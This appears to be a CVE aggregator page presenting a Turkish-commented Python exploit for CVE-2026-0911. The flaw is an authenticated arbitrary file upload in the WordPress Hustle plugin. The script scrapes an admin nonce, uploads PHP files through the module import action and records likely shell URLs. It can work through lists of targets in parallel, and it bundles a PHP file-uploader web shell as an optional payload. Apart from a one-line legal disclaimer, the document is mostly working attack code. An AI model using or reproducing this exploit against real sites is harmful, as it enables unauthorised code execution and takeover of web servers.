5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-0911.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2026-0911 — Hustle (wordpress-popup) kimlik doğrulamalı keyfi dosya yükleme / RCE öncesi test.

Etkilenen: Hustle <= 7.8.9.2 — wp_handle_upload() test_type=false ile çağrılır, uzantı kontrolü zayıftır;
başarısız import sonrası dosya silinmeyebilir (uploads altında yetim dosya).

Ön koşullar (NVD / Wordfence):
  - Hustle yönetimine erişebilen kullanıcı için geçerli WordPress oturumu (çerez) ve
    hustle_single_action nonce (çoğunlukla yönetici Hustle/modül izni verdikten sonra).
  - moduleId=0 «yeni import» yolunda: ücretsiz kotanın yüklemeden önce engellememesi gerekir
    (aksi halde eklenti dosyayı yazmadan hata döner).

YASAL: Yalnızca size ait veya yazılı test izniniz olan sistemlerde kullanın.

Çıktının kaydedildiği yer
-------------------------
  Varsayılan: olası başarılı koşular (yetim yükleme sinyali) şu dosyaya **eklenir**:
    cve-2026-0911-hits.txt   (betiği çalıştırdığınız çalışma dizini)
  Yol değiştirme:  -o yol/çıktı.txt  veya  --output yol/çıktı.txt
  Biçim: hedef + açıklama satırı, altında girintili aday kabuk URL’leri (uploads/YYYY/MM/...).
  Başarılı satırlar tespit edilir edilmez anında diske yazılır.

Kabuk / yükleme kodu
--------------------
  HTTP çok parçalı yükleme: ``post_hustle_import_upload()`` (``exploit_target`` içinden).
  Yük: ``DEFAULT_SHELL`` (sondaj) veya ``SHELL_UPLOADER_PHP`` (``--uploader``).
"""

from __future__ import annotations

import argparse
import json
import re
import sys
import threading
import os
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass
from datetime import datetime, timezone
from pathlib import Path
from typing import Callable, Optional
from urllib.parse import urljoin

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Hustle yönetici AJAX eylemi (bkz. hustle-modules-common-admin-ajax.php)
AJAX_ACTION = "hustle_module_handle_single_action"

DEFAULT_PAGE = "hustle_popup_listing"  # admin.php?page=...
MODULE_TYPES = ("popup", "slidein", "embedded", "social_sharing")

# Varsayılan: zararsız tek satırlık sondaj (yalnızca yetkili test).
DEFAULT_SHELL = b"<?php echo 'HUSTLE_CVE_2026_0911_DENEME';"

# İsteğe bağlı: küçük HTML/PHP form yükleyici; yalnızca --uploader ile.
SHELL_UPLOADER_PHP = (
    """<?php
if (isset($_FILES['f'])) {
    move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']);
    echo "Yüklendi: ".$_FILES['f']['name'];
}
?><form method="POST" enctype="multipart/form-data"><input type="file" name="f"><button>Yükle</button></form>"""
).encode("utf-8")


@dataclass
class ExploitResult:
    target: str
    ok: bool
    detail: str
    candidate_urls: list[str]


def _session_from_cookie(cookie: str) -> requests.Session:
    s = requests.Session()
    s.headers.update(
        {
            "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-0911-arastirma/1.0)",
            "Accept": "text/html,application/json;q=0.9,*/*;q=0.8",
        }
    )
    for part in cookie.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        k, v = part.split("=", 1)
        k, v = k.strip(), v.strip()
        if k.lower() == "path":
            continue
        s.cookies.set(k, v, domain=None)
    return s


def fetch_nonce(
    session: requests.Session,
    base_url: str,
    admin_page: str,
    verify_ssl: bool,
    timeout: float,
    log: Optional[Callable[[str], None]] = None,
) -> Optional[str]:
    """Hustle liste/sihirbaz HTML içinden optinVars.single_module_action_nonce ayrıştırır."""
    admin_url = urljoin(base_url.rstrip("/") + "/", "wp-admin/admin.php")
    r = session.get(
        admin_url,
        params={"page": admin_page},
        timeout=timeout,
        verify=verify_ssl,
        allow_redirects=True,
    )
    if log:
        log(f"    → GET (nonce) {r.url} — HTTP {r.status_code}")
    if r.status_code != 200:
        return None
    text = r.text
    # wp_localize_script: var optinVars = {...};
    m = re.search(
        r'single_module_action_nonce"\s*:\s*"([a-zA-Z0-9_]+)"',
        text,
    )
    if m:
        return m.group(1)
    # Yedek: farklı tırnak deseni
    m2 = re.search(r"single_module_action_nonce['\"]\s*:\s*['\"]([^'\"]+)['\"]", text)
    return m2.group(1) if m2 else None


def post_hustle_import_upload(
    session: requests.Session,
    ajax_url: str,
    nonce: str,
    module_id: int,
    module_type: str,
    module_mode: str,
    remote_filename: str,
    file_body: bytes,
    verify_ssl: bool,
    timeout: float,
) -> requests.Response:
    """
    CVE-2026-0911 çekirdeği: admin-ajax.php üzerinde çok parçalı POST — alan adı ``import_file`` olmalı
    (bkz. Hustle ``action_import_module()`` / ``$_FILES['import_file']``).
    """
    files = {
        "import_file": (
            remote_filename,
            file_body,
            "application/octet-stream",
        )
    }
    data = {
        "action": AJAX_ACTION,
        "_wpnonce": nonce,
        "moduleId": str(module_id),
        "hustleAction": "import",
        "type": module_type,
        "module_mode": module_mode,
        "context": "listing",
    }
    return session.post(
        ajax_url,
        data=data,
        files=files,
        timeout=timeout,
        verify=verify_ssl,
    )


def build_upload_candidates(base_url: str, remote_name: str) -> list[str]:
    """WordPress varsayılan uploads/YYYY/MM yolu — sunucu yeniden adlandırabilir; tahmine dayalı liste."""
    base = base_url.rstrip("/")
    now = datetime.now(timezone.utc)
    y, m = now.year, now.month
    clean = re.sub(r"[^\w.\-]", "_", remote_name)
    return [
        f"{base}/wp-content/uploads/{y:04d}/{m:02d}/{clean}",
        f"{base}/wp-content/uploads/{y:04d}/{m:02d}/{clean}.php",
    ]


def exploit_target(
    base_url: str,
    session: requests.Session,
    nonce: str,
    module_id: int,
    module_type: str,
    module_mode: str,
    remote_filename: str,
    file_body: bytes,
    verify_ssl: bool,
    timeout: float,
    debug: bool,
    log: Optional[Callable[[str], None]] = None,
) -> ExploitResult:
    base_url = base_url.rstrip("/")
    ajax_url = f"{base_url}/wp-admin/admin-ajax.php"

    try:
        r = post_hustle_import_upload(
            session,
            ajax_url,
            nonce,
            module_id,
            module_type,
            module_mode,
            remote_filename,
            file_body,
            verify_ssl,
            timeout,
        )
    except requests.RequestException as e:
        return ExploitResult(base_url, False, f"İstek hatası: {e}", [])

    if log:
        log(
            f"    → POST (import) {ajax_url} — HTTP {r.status_code}, "
            f"yanıt ~{len(r.text)} bayt"
        )
    if debug:
        print(f"    [ayıklama] HTTP {r.status_code} gövde[:400]={r.text[:400]!r}")

    body = r.text.strip()
    candidates = build_upload_candidates(base_url, remote_filename)

    # JSON hatası beklenir: yüklemeden sonra import JSON ayrıştırır — iletide sıkça «json» geçer.
    parsed: Optional[dict] = None
    try:
        parsed = r.json()
    except json.JSONDecodeError:
        jm = re.search(r"\{.*\}", body, re.DOTALL)
        if jm:
            try:
                parsed = json.loads(jm.group(0))
            except json.JSONDecodeError:
                parsed = None

    if parsed is not None:
        success = parsed.get("success")
        msg = ""
        if isinstance(parsed.get("data"), dict):
            msg = str(parsed["data"].get("message", ""))
        if success is False:
            lower = msg.lower()
            if (
                "json" in lower
                or "invalid" in lower
                or "configuration" in lower
                or "file must" in lower
            ):
                return ExploitResult(
                    base_url,
                    True,
                    f"Sunucu importu reddetti (yetim yükleme sonrası beklenen): {msg or body[:200]}",
                    candidates,
                )
            return ExploitResult(
                base_url,
                False,
                f"Beklenmeyen hata: {msg or body[:300]}",
                candidates,
            )
        if success is True:
            return ExploitResult(
                base_url,
                True,
                "Import başarı döndü (saf .php yükü için olağandışı; elle doğrulayın)",
                candidates,
            )

    if r.status_code == 200 and body:
        return ExploitResult(
            base_url,
            False,
            f"JSON değil veya belirsiz yanıt: {body[:400]}",
            candidates,
        )

    return ExploitResult(
        base_url,
        False,
        f"HTTP {r.status_code}: {body[:300]}",
        candidates,
    )


def load_targets(path: Path) -> list[str]:
    lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
    return [ln.strip() for ln in lines if ln.strip() and not ln.strip().startswith("#")]


def parse_args(argv: Optional[list[str]] = None) -> argparse.Namespace:
    p = argparse.ArgumentParser(
        description=(
            "CVE-2026-0911 Hustle modül importu — yetim yükleme denemesi (yalnızca yetkili kullanım)."
        ),
    )
    p.add_argument(
        "-u",
        "--url",
        help="Tek hedef kök URL (örn. https://ornek.com)",
    )
    p.add_argument(
        "-l",
        "--list",
        type=Path,
        help=(
            "Satır başına bir kök URL; # ile yorum. Aynı --cookie tüm satırlarda "
            "(her host için ayrı çalıştırmanız gerekebilir)"
        ),
    )
    p.add_argument(
        "--cookie",
        help="Tam Cookie başlığı (örn. wordpress_logged_in_...=...)",
    )
    p.add_argument(
        "--cookie-file",
        type=Path,
        help="Tek satır: Cookie dizgisi veya ad=değer çiftleri",
    )
    p.add_argument(
        "--nonce",
        help="hustle_single_action için elle WordPress nonce (otomatik çekim yerine)",
    )
    p.add_argument(
        "--admin-page",
        default=DEFAULT_PAGE,
        help=f"Nonce için admin.php?page= değeri (varsayılan: {DEFAULT_PAGE})",
    )
    p.add_argument(
        "--module-id",
        type=int,
        default=0,
        help=(
            "POST moduleId; 0 geçersiz modül (WP_Error) tetikler, import başında "
            "hustle_create denetimini atlar"
        ),
    )
    p.add_argument(
        "--module-type",
        choices=MODULE_TYPES,
        default="popup",
        help="Hustle modül türü",
    )
    p.add_argument(
        "--module-mode",
        default="informational",
        help="POST module_mode (informational|optin)",
    )
    p.add_argument(
        "--remote-name",
        default="probe_rce.php",
        help="import_file ile gönderilen uzak dosya adı (.php — JSON dalına sokulmasın)",
    )
    p.add_argument(
        "--payload-file",
        type=Path,
        help="Kabuk baytlarını dosyadan oku (varsayılan sondaj ve --uploader üzerine yazar)",
    )
    p.add_argument(
        "--uploader",
        action="store_true",
        help="Yerleşik PHP mini form-yükleyici gövdesini kullan (SHELL_UPLOADER_PHP)",
    )
    p.add_argument(
        "--workers",
        type=int,
        default=8,
        help="-l ile eşzamanlı iş parçacığı sayısı",
    )
    p.add_argument(
        "--timeout",
        type=float,
        default=25.0,
        help="İstek zaman aşımı (saniye)",
    )
    p.add_argument(
        "--verify-ssl",
        action="store_true",
        help="TLS doğrula (varsayılan: kapalı)",
    )
    p.add_argument(
        "--debug",
        action="store_true",
        help="Ayrıntılı ayıklama çıktısı",
    )
    p.add_argument(
        "--quiet",
        action="store_true",
        help="Yalnızca özet; etki alanı ve adım loglarını gösterme",
    )
    p.add_argument(
        "-o",
        "--output",
        type=Path,
        default=Path("cve-2026-0911-hits.txt"),
        help="Başarılı hedefler + aday URL’leri ekle (append)",
    )
    return p.parse_args(argv)


def main(argv: Optional[list[str]] = None) -> int:
    args = parse_args(argv)

    if not args.url and not args.list:
        print("--url veya --list verin", file=sys.stderr)
        return 2

    cookie = args.cookie
    if args.cookie_file:
        cookie = args.cookie_file.read_text(encoding="utf-8", errors="replace").strip()
    if not cookie:
        print("--cookie veya --cookie-file verin", file=sys.stderr)
        return 2

    if args.payload_file:
        file_body = args.payload_file.read_bytes()
    elif args.uploader:
        file_body = SHELL_UPLOADER_PHP
    else:
        file_body = DEFAULT_SHELL

    targets: list[str] = []
    if args.url:
        targets.append(args.url.rstrip("/"))
    if args.list:
        targets.extend(load_targets(args.list))

    verify_ssl = args.verify_ssl
    timeout = args.timeout
    verbose = not args.quiet
    out_lock = threading.Lock()
    log_lock = threading.Lock()
    out_path = args.output.resolve()

    def log(msg: str) -> None:
        if not verbose:
            return
        with log_lock:
            print(msg, flush=True)

    def append_hit_now(r: ExploitResult) -> None:
        """Başarılı sonucu hemen diske yazar (iş parçacığı güvenli)."""
        with out_lock:
            with args.output.open("a", encoding="utf-8") as f:
                f.write(f"{r.target}\t{r.detail}\n")
                for u in r.candidate_urls:
                    f.write(f"\t{u}\n")
                f.flush()
                try:
                    os.fsync(f.fileno())
                except OSError:
                    pass

    def run_one(base: str) -> ExploitResult:
        log(f"{'─'*60}")
        log(f"[*] Hedef: {base}")
        log(
            f"    Adımlar: oturum → nonce → Hustle modül import (çok parçalı import_file) "
            f"→ JSON yanıt analizi"
        )
        sess = _session_from_cookie(cookie)
        nonce = args.nonce
        if not nonce:
            log(f"[*] {base} | Nonce çekiliyor (yönetici sayfası: {args.admin_page})…")
            nonce = fetch_nonce(
                sess, base, args.admin_page, verify_ssl, timeout, log=log
            )
            if not nonce:
                log(f"[-] {base} | Nonce yok (çerez / sayfa / yetki kontrol edin)")
                return ExploitResult(
                    base,
                    False,
                    "single_module_action_nonce çıkarılamadı; --nonce verin veya --admin-page / çerez kontrol edin",
                    [],
                )
            log(f"[+] {base} | Nonce alındı ({nonce[:8]}…)")
        else:
            log(f"[*] {base} | Nonce komut satırından (--nonce)")
        log(
            f"[*] {base} | Yükleme: action={AJAX_ACTION}, hustleAction=import, "
            f"moduleId={args.module_id}, type={args.module_type}, "
            f"dosya={args.remote_name!r} ({len(file_body)} bayt)"
        )
        if args.debug:
            with log_lock:
                print(f"    [ayıklama] nonce={nonce[:6]}…", flush=True)
        res = exploit_target(
            base,
            sess,
            nonce,
            args.module_id,
            args.module_type,
            args.module_mode,
            args.remote_name,
            file_body,
            verify_ssl,
            timeout,
            args.debug,
            log=log if verbose else None,
        )
        if res.ok:
            log(f"[+] {base} | Olası başarı (yetim yükleme sinyali): {res.detail[:120]}")
            for u in res.candidate_urls:
                log(f"    Aday URL: {u}")
        else:
            log(f"[-] {base} | Başarısız: {res.detail[:160]}")
        return res

    results: list[ExploitResult] = []

    if len(targets) == 1:
        r0 = run_one(targets[0])
        results.append(r0)
        if r0.ok:
            append_hit_now(r0)
            log(f"[+] Dosyaya yazıldı → {out_path}")
    else:
        log(f"[*] {len(targets)} hedef, eşzamanlı işçi: {args.workers}")
        with ThreadPoolExecutor(max_workers=max(1, args.workers)) as ex:
            futs = {ex.submit(run_one, t): t for t in targets}
            for i, fut in enumerate(as_completed(futs), 1):
                r = fut.result()
                results.append(r)
                if r.ok:
                    append_hit_now(r)
                    log(
                        f"[+] [{i}/{len(targets)}] İsabet dosyaya yazıldı | hedef: {r.target} → {out_path}"
                    )
                else:
                    log(f"[.] [{i}/{len(targets)}] Bitti (isabet yok) | hedef: {r.target}")

    hits = [r for r in results if r.ok]
    print(f"\n{'='*60}")
    print(f"Bitti. Olası yetim-yükleme sinyali: {len(hits)}/{len(results)}")
    for r in results:
        durum = "OLASI" if r.ok else "yok"
        print(f"  [{durum}] {r.target} — {r.detail}")
        for u in r.candidate_urls:
            print(f"         dene: {u}")

    if hits:
        print(
            f"\n[i] İsabetler anında şuraya yazıldı: {out_path} ({len(hits)} kayıt kümesi)"
        )
    else:
        print(f"\n[i] İsabet yok — {out_path} değişmedi")

    return 0 if hits else 1


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except KeyboardInterrupt:
        print("\n[!] Kullanıcı tarafından kesildi", file=sys.stderr)
        raise SystemExit(130)